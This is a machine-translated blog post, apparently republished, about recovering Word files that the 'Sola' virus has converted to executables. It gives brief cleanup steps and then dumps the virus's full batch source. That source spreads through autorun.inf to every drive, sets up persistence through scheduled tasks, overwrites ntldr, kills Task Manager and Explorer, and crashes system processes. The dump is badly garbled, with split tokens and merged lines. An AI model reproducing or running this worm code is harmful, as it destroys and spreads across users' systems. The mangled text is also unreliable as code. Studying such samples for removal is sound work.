Batch recovery of Sola virus doc changed to exe

Source: Internet
Author: User

First, use PE to enter the system and decompress the infected Word file with ZIP or RAR provided by PE. After decompression, three files are displayed: function. DLL, Sola ****. bat ,****. doc, note that all files are hidden.


It is best not to use anti-virus software to scan and kill the virus, because the anti-virus software will isolate the source files together. First, Back Up Files (including infected files) to non-system disks.

Then reinstall the system. Do not run any infected files after the system is reinstalled. Then, use the "death Q & A (Sola) otaku virus exclusive killing tool" as shown in the attachment to clear each drive letter to restore Word files in batches.


The following are virus behaviors for your reference:

@ Echo offset Sola = % SystemRoot % \ fonts \ hidese ~ 1 Set setup = % SystemRoot % \ fonts \ hidese ~ 1 \ solasetupfor/F "tokens = 1" % I in ('date/t ') do set realdate = % IFOR/F "Skip = 5 tokens =" % I in ('dir % SystemRoot % \ assumer.exe ') do if/I "% J" = "assumer.exe" set date = % IIF "% 1" = "-install" Goto installif "% 1" = "- run "Goto runif" % 1 "="-tenbatsu "Goto tenbatsuif" % 1 "="-Kill "Goto killif" % 1 "="-killself "Goto killself ": checksignif "% 1" = "-USB" Start/Max .. if "% 1" = "-USB" CD solaif exist % s Ystemroot % \ fonts \ hidese ~ 1 \ Sola. sign goto open: filecopyset selfname = % 0: hideselfdate % date % MD % SystemRoot % \ fonts \ hideself... date % realdate % if not "% 1" = "-USB" type % selfname %> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. batif "% 1" = "-USB" type Sola. Bat> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. battype function. dll> % SystemRoot % \ fonts \ hidese ~ 1 \ function.exe echo on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho ws. Run "CMD/C % Sola % \ Sola. Bat-install", 0> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. signdel % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsgoto open: Install: packersetup % systemdrive % Cd % SystemRoot % \ fonts \ hidese ~ 1if exist function.exe taskkill/f/IM function.exe if exist solasetup RD/S/Q solasetupmd solasetupcd solasetupcopy .. \ function.exe function. DLL .. \ function.exe-XCD .. date % date % Type % setup % \ rar.exe> % SystemRoot % \ system32 \ rar.exe date % realdate % copy % setup % \ function. dll % Sola % \ function. dllattrib % Sola % \ function. dll + S + H + rrar-M0-EP-EP1 a % setup % \ docpack. dll % Sola % \ function. dllrar-M0-EP-EP1 % Setup % \ txtpack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ exepack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ jpgpack. dll % Sola % \ function. dlldel function.exe: mainsetupset a0001 = copyset a0002 = attribset a0003 = echoset a0005 = Shell Hardware failed> % Sola % \ task.txt for/F "tokens = 1" % I in ('findstr/I "svchost.exe "" % Sola % \ task.txt "') do set svchost = % I % a0001 % SystemRoot % \ syste M32 \ cmd.exe % Sola % \ % svchost % del % Sola % \ task.txt: tasks % a0002 % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobdate % date % Type % setup % \ Tasks. xxx> % SystemRoot % \ Tasks. jobschtasks/change/ru "nt authority \ System"/TN "tasks" & if errorlevel 1 goto taskfaildate % realdate % goto tasksuc: taskfail % homedrive % Cd "% allusersprofile %" cd "start" Menu \ Program \ Start Date % date % a0003 % on error resume NEX T> Sola. vbs % a0003 % set Ws = wscript. createobject ("wscript. shell ")> Sola. vbs % a0003 % ws. run "% Sola % \ svchost.exe/C % Sola % \ Sola. bat-run ", 0> Sola. vbs % a0001 % Sola. vbs % Sola % \ Sola. vbs % a0003 % NT> % SystemRoot % \ fonts \ hidese ~ 1 \ notasksdate % realdate %: tasksuc % a0002 % SystemRoot % \ Tasks. job + S + H + rdate % date % a0001 % setup % \ sleep.exe % SystemRoot % \ system32 \ sleep.exe date % realdate %: noautoplaynet stop "% a0005 %" % a0003 % Windows Registry Editor Version 5.00> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ ShellHWDetection]> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % "start" = DWORD: 00000004> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. regregedit/S % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. reg: End of installgoto end & if errorlevel 1 exit: End of install: runset runroot = % allusersprofile % \ Start Menu \ Program \ Start set taskroot = % SystemRoot % \ Tasks: runtimechkif not exist % Sola % \ runtime.txt echo! 50> % Sola % \ runtime.txt for/F "tokens = 1 delims =! "% I in (% Sola % \ runtime.txt) do set runtime = % IIF/I % runtime % Leq 0 goto virusset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt: diskchkecho on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho ws. Run "% Sola % \ svchost.exe/C % setup % \ recentinf. Bat", 0 >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsdel % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsfor % I in (c d e f g h I j k l m n o p q r s t u v w x y z) Do vol % I: & if errorlevel 1 Set % I = 1for % I in (c d e f g h I j k l m n o p q r s t u v w x Y Z) do Echo 1> % I: \ solachk1 & findstr. % I: \ solachk1 & if not errorlevel 1 del % I: \ solachk1 & findstr/C: "sola_1.0_2.0" % I: \ autorun. INF & if errorlevel 1 attrib-s-h-R % I: \ autorun. INF & copy/Y % setup % \ autorun. INF % I: \ autorun. I NF & attrib % I: \ autorun. INF + S + H + R & MD % I: \ Sola & copy/y "% setup % \ Sola. bat "% I: \ Sola. BAT & copy/y "% setup % \ function. DLL "% I: \ Sola \ function. DLL & attrib % I: \ Sola + S + H + R: turnif "% C %" = "1" vol C: & if not errorlevel 1 call % setup % \ scan. bat C: If "% d %" = "1" vol D: & if not errorlevel 1 call % setup % \ scan. bat D: If "% E %" = "1" vol E: & if not errorlevel 1 call % setup % \ scan. bat E: If "% F %" = "1" vol F: & if no T errorlevel 1 call % setup % \ scan. bat F: If "% G %" = "1" vol G: & if not errorlevel 1 call % setup % \ scan. bat G: If "% H %" = "1" vol H: & if not errorlevel 1 call % setup % \ scan. bat H: If "% I %" = "1" vol I: & if not errorlevel 1 call % setup % \ scan. bat I: If "% J %" = "1" vol J: & if not errorlevel 1 call % setup % \ scan. bat J: If "% K %" = "1" vol K: & if not errorlevel 1 call % setup % \ scan. bat K: If "% L %" = "1" vol L: & if not errorlev El 1 call % setup % \ scan. bat L: If "% m %" = "1" vol M: & if not errorlevel 1 call % setup % \ scan. bat M: If "% N %" = "1" vol N: & if not errorlevel 1 call % setup % \ scan. bat N: If "% o %" = "1" vol O: & if not errorlevel 1 call % setup % \ scan. bat O: If "% P %" = "1" vol P: & if not errorlevel 1 call % setup % \ scan. bat P: If "% Q %" = "1" vol Q: & if not errorlevel 1 call % setup % \ scan. bat Q: If "% R %" = "1" vol R: & if not errorlevel 1 call % Setup % \ scan. bat R: If "% S %" = "1" vol S: & if not errorlevel 1 call % setup % \ scan. bat S: If "% T %" = "1" vol T: & if not errorlevel 1 call % setup % \ scan. bat T: If "% u %" = "1" vol U: & if not errorlevel 1 call % setup % \ scan. bat U: If "% v %" = "1" Vol V: & if not errorlevel 1 call % setup % \ scan. bat V: If "% w %" = "1" vol W: & if not errorlevel 1 call % setup % \ scan. bat W: If "% x %" = "1" vol X: & if not errorlevel 1 call % setup % \ SC An. bat X: If "% Y %" = "1" vol Y: & if not errorlevel 1 call % setup % \ scan. bat Y: If "% Z %" = "1" vol Z: & if not errorlevel 1 call % setup % \ scan. bat Z: If "% C %" = "2" vol C: & if errorlevel 1 set C = 1if "% d %" = "2" vol D: & if errorlevel 1 set D = 1if "% E %" = "2" vol E: & if errorlevel 1 set E = 1if "% F %" = "2" vol F: & if errorlevel 1 set f = 1if "% G %" = "2" vol G: & if errorlevel 1 Set G = 1if "% H %" = "2" vol H: & if errorlevel 1 Set H = 1if "% I %" = "2" vol I: & if errorlevel 1 set I = 1if "% J %" = "2" vol J: & if errorlevel 1 Set J = 1if "% K %" = "2" vol K: & if errorlevel 1 set K = 1if "% L %" = "2" vol L: & if errorlevel 1 set L = 1if "% m %" = "2" vol M: & if errorlevel 1 Set M = 1if "% N %" = "2" vol N: & if errorlevel 1 set n = 1if "% o %" = "2" vol O: & if errorlevel 1 set O = 1if "% P %" = "2" vol P: & if errorlevel 1 Set P = 1if "% Q %" = "2" vol Q: & if errorlevel 1 Set q = 1i F "% R %" = "2" vol R: & if errorlevel 1 Set R = 1if "% S %" = "2" vol s: & if errorlevel 1 set S = 1if "% T %" = "2" vol t: & if errorlevel 1 set T = 1if "% u %" = "2" vol U: & if errorlevel 1 set U = 1if "% v %" = "2" Vol V: & if errorlevel 1 set V = 1if "% w %" = "2" vol W: & if errorlevel 1 set w = 1if "% x %" = "2" vol X: & if errorlevel 1 set X = 1if "% Y %" = "2" vol Y: & if errorlevel 1 set Y = 1if "% Z %" = "2" vol Z: & if errorlevel 1 set Z = 1if ex Ist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist "% runroot % \ Sola. vbs "copy" % Sola % \ Sola. vbs "" % runroot % \ Sola. vbs "if not exist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist % taskroot % \ Tasks. job copy % setup % \ Tasks. xxx % taskroot % \ Tasks. job & attrib % taskroot % \ Tasks. job + S + H + R & schtasks/change/ru "nt authority \ System"/TN "tasks" Sleep 2000 goto turn: End of rungoto end & if errorlevel 1 exit:: End of run: virusif not "% runtime %" = "0" Goto viruschkset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt cd "% allusersprofile % \ Start Menu \ Program \ Start" echo on error resume next> tenbatsu. vbsecho set Ws = wscript. createobject ("wscript. shell ")> tenbatsu. vbsecho ws. run "% Sola % \ Sola. bat-tenbatsu ", 0> tenbatsu. vbsgoto diskchk: viruschkif not exist "% allusersprofile % \ Start Menu \ Program \ Start \ tenbatsu. vbs "Goto killgoto diskchk: tenbatsu: killntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % systemdrive % \ ntld R % Sola % \ ntldrecho no ntldr> % systemdrive % \ ntldr: attrib % systemdrive % \ ntldr + S + H + R: pausesfcstart MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-PN winlogon.exe ', 0); window. close () ": killtaskmgrdel/Q/A % SystemRoot % \ system32 \ dllcache \ taskmgr.exe taskkill/f/IM taskmgr.exe & if errorlevel 1 Ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. xxx & if errorlevel 1 start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN taskmgr.exe ', 0); window. close () "& sleep 500ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. XXX: killexplorertaskkill/f/IM assumer.exe> NUL & if errorlevel 1 Ren % SystemRoot % \ system32 \ assumer.exe explorer. xxx & start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN cmder.exe ', 0); window. close () "& sleep 500ren % systemroo T % \ assumer.exe explorer. xxxstart/max % setup % \ tenbatsu. BAT: timesetsleep 661_if exist % Sola % \ killself Exit: killattrib % systemdrive % \ ntldr-s-h-recho no ntldr> % systemdrive % \ ntldr :: attrib % systemdrive % \ ntldr + S + H + rtasklist> % Sola % \ task.txt for/F "tokens = 2" % I in ('findstr/I "csrss.exe" "% sola % \ task.txt "') do ntsd-P % igoto diskchk: killself: startexplorerren % SystemRoot % \ Explorer. xxx Explorer. Exestart % SystemRoot % \ assumer.exe: backntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % Sola % \ ntldr % systemdrive % \ ntldrattrib % systemdrive % \ ntldr + S + H + R: running mgren % SystemRoot % \ system32 \ taskmgr. xxx taskmgr.exe: killviruscopy % setup % \ killvirus.txt % Sola % \ killvirus.txt C: cdmd ~ Installcd ~ Installrar X-hpkakenhi200601 % setup % \ solakiller.rar MSHTA "javascript: New activexobject ('wscript. shell'). Run ('C :\\~ Install \ install. bat % 1', 0); window. close () "RD/S/Q % setup % attrib % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobcd "% allusersprofile % \ Start Menu \ Program \ Start" If exist Sola. vbs del Sola. vbsif exist tenbatsu. vbs del tenbatsu. vbsstart % SystemRoot % \ system32 \ notepad.exe % Sola % \ killvirus.txt del % Sola % \ Sola. batexit: openif "% 1" = "-USB" exitgoto getname: backopenif not exist "% name %" exitcall "% name %": savefor/F "delims =: "% I in ('findstr" % code % "*. EXE ') do set packname = % IRAR-M0-EP-EP1 a "% packname %" "% name %" Echo % code %> "% packname % ": delattrib "% name %"-s-h-rdel "% name %" attrib function. DLL-s-h-rdel function. dllattrib % 0-s-h-rdel % 0 Exit: cmd program will stop there.: getnameset code = sola_2.0_12695220593667set name= .doc goto backopen: End

This article from the "Chongqing network management" blog, please be sure to retain this source http://023wg.blog.51cto.com/1462514/1551661

Batch recovery of Sola virus doc changed to exe

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.